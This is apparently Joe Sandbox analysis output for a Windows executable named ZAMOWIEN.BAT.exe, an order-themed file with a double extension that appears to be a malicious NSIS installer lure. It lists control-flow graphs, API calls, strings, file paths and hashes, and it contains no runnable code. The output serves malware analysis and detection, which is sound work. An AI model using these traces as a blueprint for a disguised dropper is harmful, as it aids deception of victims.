                                                                            control_flow_graph 258 403d5a-403d72 call 406a7c 261 403d74-403d84 call 4065cf 258->261 262 403d86-403dbd call 406556 258->262 270 403de0-403e09 call 404030 call 40605f 261->270 266 403dd5-403ddb lstrcatW 262->266 267 403dbf-403dd0 call 406556 262->267 266->270 267->266 276 403e9b-403ea3 call 40605f 270->276 277 403e0f-403e14 270->277 283 403eb1-403ed6 LoadImageW 276->283 284 403ea5-403eac call 4066c5 276->284 277->276 278 403e1a-403e42 call 406556 277->278 278->276 288 403e44-403e48 278->288 286 403f57-403f5f call 40140b 283->286 287 403ed8-403f08 RegisterClassW 283->287 284->283 301 403f61-403f64 286->301 302 403f69-403f74 call 404030 286->302 289 404026 287->289 290 403f0e-403f52 SystemParametersInfoW CreateWindowExW 287->290 292 403e5a-403e66 lstrlenW 288->292 293 403e4a-403e57 call 405f84 288->293 295 404028-40402f 289->295 290->286 296 403e68-403e76 lstrcmpiW 292->296 297 403e8e-403e96 call 405f57 call 406688 292->297 293->292 296->297 300 403e78-403e82 GetFileAttributesW 296->300 297->276 304 403e84-403e86 300->304 305 403e88-403e89 call 405fa3 300->305 301->295 311 403f7a-403f94 ShowWindow call 406a0c 302->311 312 403ffd-404005 call 4057e0 302->312 304->297 304->305 305->297 319 403fa0-403fb2 GetClassInfoW 311->319 320 403f96-403f9b call 406a0c 311->320 317 404007-40400d 312->317 318 40401f-404021 call 40140b 312->318 317->301 323 404013-40401a call 40140b 317->323 318->289 321 403fb4-403fc4 GetClassInfoW RegisterClassW 319->321 322 403fca-403fed DialogBoxParamW call 40140b 319->322 320->319 321->322 328 403ff2-403ffb call 403caa 322->328 323->301 328->295
                                                                            APIs
                                                                              • Part of subcall function 00406A7C: GetModuleHandleA.KERNEL32(?,00000020,?,0040375B,0000000C), ref: 00406A8E
                                                                              • Part of subcall function 00406A7C: GetProcAddress.KERNEL32(00000000,?), ref: 00406AA9
                                                                            • lstrcatW.KERNEL32(1033,007A1788,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1788,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"), ref: 00403DDB
                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne,1033,007A1788,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1788,00000000,00000002,74DF3420), ref: 00403E5B
                                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne,1033,007A1788,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1788,00000000), ref: 00403E6E
                                                                            • GetFileAttributesW.KERNEL32(Call), ref: 00403E79
                                                                            • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne), ref: 00403EC2
                                                                              • Part of subcall function 004065CF: wsprintfW.USER32 ref: 004065DC
                                                                            • RegisterClassW.USER32(007A7240), ref: 00403EFF
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F17
                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F4C
                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403F82
                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,007A7240), ref: 00403FAE
                                                                            • GetClassInfoW.USER32(00000000,RichEdit,007A7240), ref: 00403FBB
                                                                            • RegisterClassW.USER32(007A7240), ref: 00403FC4
                                                                            • DialogBoxParamW.USER32(?,00000000,00404108,00000000), ref: 00403FE3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$.DEFAULT\Control Panel\International$.exe$1033$@rz$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                            • API String ID: 1975747703-71862671
                                                                            • Opcode ID: 7d4ed341b8cde1e0ceb827ac5ff258b46ad7f178c8ae00572014113b92d4ccdc
                                                                            • Instruction ID: c3905a2e03a3d38e695f7bd5a945e2bfd4337e3c47ad7fe5276eed6c7ef54057
                                                                            • Opcode Fuzzy Hash: 7d4ed341b8cde1e0ceb827ac5ff258b46ad7f178c8ae00572014113b92d4ccdc
                                                                            • Instruction Fuzzy Hash: 8361B370500601AED720BB269D49F2B3AACEBC5B45F40453EFA45B62E2DB7D5801CB6D

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 332 4030d5-403123 GetTickCount GetModuleFileNameW call 406178 335 403125-40312a 332->335 336 40312f-40315d call 406688 call 405fa3 call 406688 GetFileSize 332->336 337 403375-403379 335->337 344 403163-40317a 336->344 345 40324b-403259 call 403033 336->345 346 40317c 344->346 347 40317e-40318b call 4035ed 344->347 351 40332d-403332 345->351 352 40325f-403262 345->352 346->347 356 403191-403197 347->356 357 4032e9-4032f1 call 403033 347->357 351->337 354 403264-40327c call 403603 call 4035ed 352->354 355 40328e-4032dd GlobalAlloc call 4061a7 CreateFileW 352->355 354->351 382 403282-403288 354->382 373 4032f3-403323 call 403603 call 40337c 355->373 374 4032df-4032e4 355->374 360 403217-40321b 356->360 361 403199-4031b1 call 406133 356->361 357->351 364 403224-40322a 360->364 365 40321d-403223 call 403033 360->365 361->364 379 4031b3-4031ba 361->379 371 40322c-40323a call 406b69 364->371 372 40323d-403245 364->372 365->364 371->372 372->344 372->345 387 403328-40332b 373->387 374->337 379->364 384 4031bc-4031c3 379->384 382->351 382->355 384->364 386 4031c5-4031cc 384->386 386->364 388 4031ce-4031d5 386->388 387->351 389 403334-403345 387->389 388->364 390 4031d7-4031f7 388->390 392 403347 389->392 393 40334d-403352 389->393 390->351 391 4031fd-403201 390->391 394 403203-403207 391->394 395 403209-403211 391->395 392->393 396 403353-403359 393->396 394->345 394->395 395->364 397 403213-403215 395->397 396->396 398 40335b-403373 call 406133 396->398 397->364 398->337
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 004030E9
                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,00000400), ref: 00403105
                                                                              • Part of subcall function 00406178: GetFileAttributesW.KERNELBASE(?,00403118,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003), ref: 0040617C
                                                                              • Part of subcall function 00406178: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 0040619E
                                                                            • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003), ref: 0040314E
                                                                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403293
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                            • String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ZAMOWIEN.BAT.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                            • API String ID: 2803837635-3554667666
                                                                            • Opcode ID: 4a29336d4ffd7063b2f4bdbec6a443a05de1bf81f4acacd5cb93d96bc8856641
                                                                            • Instruction ID: 77705ff1489b86543c93a013a68cfb70fd5493799dc798e6d10fcecd57b94fec
                                                                            • Opcode Fuzzy Hash: 4a29336d4ffd7063b2f4bdbec6a443a05de1bf81f4acacd5cb93d96bc8856641
                                                                            • Instruction Fuzzy Hash: 9A71F271900204ABCB20EFA4ED85BAE7EA8BB05316F20417FE505F62D1CB7C8A418B5D

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 622 4066c5-4066ce 623 4066d0-4066df 622->623 624 4066e1-4066fb 622->624 623->624 625 406701-40670d 624->625 626 40690b-406911 624->626 625->626 629 406713-40671a 625->629 627 406917-406924 626->627 628 40671f-40672c 626->628 630 406930-406933 627->630 631 406926-40692b call 406688 627->631 628->627 632 406732-40673b 628->632 629->626 631->630 633 406741-406784 632->633 634 4068f8 632->634 636 40678a-406796 633->636 637 40689c-4068a0 633->637 638 406906-406909 634->638 639 4068fa-406904 634->639 640 4067a0-4067a2 636->640 641 406798 636->641 642 4068a2-4068a9 637->642 643 4068d4-4068d8 637->643 638->626 639->626 646 4067a4-4067c2 call 406556 640->646 647 4067dc-4067df 640->647 641->640 644 4068b9-4068c5 call 406688 642->644 645 4068ab-4068b7 call 4065cf 642->645 648 4068e8-4068f6 lstrlenW 643->648 649 4068da-4068e3 call 4066c5 643->649 658 4068ca-4068d0 644->658 645->658 657 4067c7-4067ca 646->657 653 4067e1-4067ed GetSystemDirectoryW 647->653 654 4067f2-4067f5 647->654 648->626 649->648 659 40687f-406882 653->659 660 406807-40680b 654->660 661 4067f7-406803 GetWindowsDirectoryW 654->661 662 4067d0-4067d7 call 4066c5 657->662 663 406884-406887 657->663 658->648 664 4068d2 658->664 659->663 665 406894-40689a call 406936 659->665 660->659 666 40680d-40682b 660->666 661->660 662->659 663->665 670 406889-40688f lstrcatW 663->670 664->665 665->648 667 40682d-406833 666->667 668 40683f-406857 call 406a7c 666->668 675 40683b-40683d 667->675 679 406859-40686c SHGetPathFromIDListW CoTaskMemFree 668->679 680 40686e-406877 668->680 670->665 675->668 677 406879-40687d 675->677 677->659 679->677 679->680 680->666 680->677
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067E7
                                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,?,?), ref: 004067FD
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 0040685B
                                                                            • CoTaskMemFree.OLE32(00000000,?,?,00000007,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,?,?), ref: 00406864
                                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,?,?), ref: 0040688F
                                                                            • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,?,?), ref: 004068E9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                            • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                            • API String ID: 4024019347-2570203866
                                                                            • Opcode ID: 201dd695b3f630f4e881aaffbe3331da93e712b82754bfa4232950d621dbd105
                                                                            • Instruction ID: b657eecb44189dbf2ea588c4ce8a7a0ca8efa793a9a620c6a6bfd928ad763d37
                                                                            • Opcode Fuzzy Hash: 201dd695b3f630f4e881aaffbe3331da93e712b82754bfa4232950d621dbd105
                                                                            • Instruction Fuzzy Hash: D06157B26056005FD7206F25CC80B7A77E4AF95318F15863FF683B22D0DA3D8961865E

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 745 40570d-405722 746 405728-405739 745->746 747 4057d9-4057dd 745->747 748 405744-405750 lstrlenW 746->748 749 40573b-40573f call 4066c5 746->749 751 405752-405762 lstrlenW 748->751 752 40576d-405771 748->752 749->748 751->747 753 405764-405768 lstrcatW 751->753 754 405780-405784 752->754 755 405773-40577a SetWindowTextW 752->755 753->752 756 405786-4057c8 SendMessageW * 3 754->756 757 4057ca-4057cc 754->757 755->754 756->757 757->747 758 4057ce-4057d1 757->758 758->747
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,00000000,00000000,00000000), ref: 00405745
                                                                            • lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,00000000,00000000,00000000), ref: 00405755
                                                                            • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,00000000,00000000,00000000), ref: 00405768
                                                                            • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll), ref: 0040577A
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057A0
                                                                            • SendMessageW.USER32(?,0000104D,00000000,?), ref: 004057BA
                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                            • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll
                                                                            • API String ID: 2531174081-3374265676
                                                                            • Opcode ID: ffb6b0f07760ea01c7bb82b55b40d6e58c63f7c8e02640becad7bdec7db374c2
                                                                            • Instruction ID: 56a05586292be73b733a1689028d4f4abe6e67a07e0ac7e122918b94fd064fd5
                                                                            • Opcode Fuzzy Hash: ffb6b0f07760ea01c7bb82b55b40d6e58c63f7c8e02640becad7bdec7db374c2
                                                                            • Instruction Fuzzy Hash: 2E219D75900518FACF119FA6DD84ADFBFB8EF85310F10802AF905B62A0C7795A50DFA8

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 759 406a0c-406a2c GetSystemDirectoryW 760 406a30-406a32 759->760 761 406a2e 759->761 762 406a43-406a45 760->762 763 406a34-406a3d 760->763 761->760 764 406a46-406a79 wsprintfW LoadLibraryExW 762->764 763->762 765 406a3f-406a41 763->765 765->764
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A23
                                                                            • wsprintfW.USER32 ref: 00406A5E
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A72
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                            • String ID: %s%S.dll$UXTHEME
                                                                            • API String ID: 2200240437-1106614640
                                                                            • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                            • Instruction ID: 85504e4fb27a0db70598b33b690dc1f4826760d0c8c8d823ad52724bbb6d9fa0
                                                                            • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                            • Instruction Fuzzy Hash: 62F0FC3060011967CF14BB64DD0EF9B375C9B41344F10447AA546F10D0EB789665CB98

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 766 6e351817-6e351856 call 6e351bff 770 6e351976-6e351978 766->770 771 6e35185c-6e351860 766->771 772 6e351862-6e351868 call 6e35243e 771->772 773 6e351869-6e351876 call 6e352480 771->773 772->773 778 6e3518a6-6e3518ad 773->778 779 6e351878-6e35187d 773->779 780 6e3518cd-6e3518d1 778->780 781 6e3518af-6e3518cb call 6e352655 call 6e351654 call 6e351312 GlobalFree 778->781 782 6e35187f-6e351880 779->782 783 6e351898-6e35189b 779->783 787 6e3518d3-6e35191c call 6e351666 call 6e352655 780->787 788 6e35191e-6e351924 call 6e352655 780->788 803 6e351925-6e351929 781->803 785 6e351882-6e351883 782->785 786 6e351888-6e351889 call 6e352b98 782->786 783->778 789 6e35189d-6e35189e call 6e352e23 783->789 791 6e351885-6e351886 785->791 792 6e351890-6e351896 call 6e352810 785->792 798 6e35188e 786->798 787->803 788->803 801 6e3518a3 789->801 791->778 791->786 807 6e3518a5 792->807 798->801 801->807 808 6e351966-6e35196d 803->808 809 6e35192b-6e351939 call 6e352618 803->809 807->778 808->770 814 6e35196f-6e351970 GlobalFree 808->814 816 6e351951-6e351958 809->816 817 6e35193b-6e35193e 809->817 814->770 816->808 819 6e35195a-6e351965 call 6e3515dd 816->819 817->816 818 6e351940-6e351948 817->818 818->816 820 6e35194a-6e35194b FreeLibrary 818->820 819->808 820->816
                                                                            APIs
                                                                              • Part of subcall function 6E351BFF: GlobalFree.KERNEL32(?), ref: 6E351E74
                                                                              • Part of subcall function 6E351BFF: GlobalFree.KERNEL32(?), ref: 6E351E79
                                                                              • Part of subcall function 6E351BFF: GlobalFree.KERNEL32(?), ref: 6E351E7E
                                                                            • GlobalFree.KERNEL32(00000000), ref: 6E3518C5
                                                                            • FreeLibrary.KERNEL32(?), ref: 6E35194B
                                                                            • GlobalFree.KERNEL32(00000000), ref: 6E351970
                                                                              • Part of subcall function 6E35243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6E35246F
                                                                              • Part of subcall function 6E352810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6E351896,00000000), ref: 6E3528E0
                                                                              • Part of subcall function 6E351666: wsprintfW.USER32 ref: 6E351694
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2093089192.000000006E351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E350000, based on PE: true
                                                                            • Associated: 00000000.00000002.2093066982.000000006E350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2093101356.000000006E354000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2093112847.000000006E356000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e350000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                                                            • String ID:
                                                                            • API String ID: 3962662361-3916222277
                                                                            • Opcode ID: 4ad404b905b58fe295ebf03c9deefa9a2a1d74d0972e10c0b3d9fb74c223cdbb
                                                                            • Instruction ID: 8e63523d133c8910dbf98d7f1357c3a59d7998638ad80001231b414cf4728b30
                                                                            • Opcode Fuzzy Hash: 4ad404b905b58fe295ebf03c9deefa9a2a1d74d0972e10c0b3d9fb74c223cdbb
                                                                            • Instruction Fuzzy Hash: CB41E371800B42EBDF509FE4C984FE537ACAF05314F1448A5ED999B38ADBB590ACC7A0

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 823 403484-4034ac GetTickCount 824 4034b2-4034dd call 403603 SetFilePointer 823->824 825 4035dc-4035e4 call 403033 823->825 831 4034e2-4034f4 824->831 830 4035e6-4035ea 825->830 832 4034f6 831->832 833 4034f8-403506 call 4035ed 831->833 832->833 836 40350c-403518 833->836 837 4035ce-4035d1 833->837 838 40351e-403524 836->838 837->830 839 403526-40352c 838->839 840 40354f-40356b call 406bd7 838->840 839->840 842 40352e-40354e call 403033 839->842 845 4035d7 840->845 846 40356d-403575 840->846 842->840 850 4035d9-4035da 845->850 848 403577-40357f call 40622a 846->848 849 403598-40359e 846->849 853 403584-403586 848->853 849->845 852 4035a0-4035a2 849->852 850->830 852->845 854 4035a4-4035b7 852->854 855 4035d3-4035d5 853->855 856 403588-403594 853->856 854->831 857 4035bd-4035cc SetFilePointer 854->857 855->850 856->838 858 403596 856->858 857->825 858->854
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00403498
                                                                              • Part of subcall function 00403603: SetFilePointer.KERNELBASE(?,00000000,00000000,00403301,?), ref: 00403611
                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033AE,00000004,00000000,00000000,?,?,00403328,000000FF,00000000,00000000,?,?), ref: 004034CB
                                                                            • SetFilePointer.KERNELBASE(00003E88,00000000,00000000,0040CE68,00793730,00004000,?,00000000,004033AE,00000004,00000000,00000000,?,?,00403328,000000FF), ref: 004035C6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
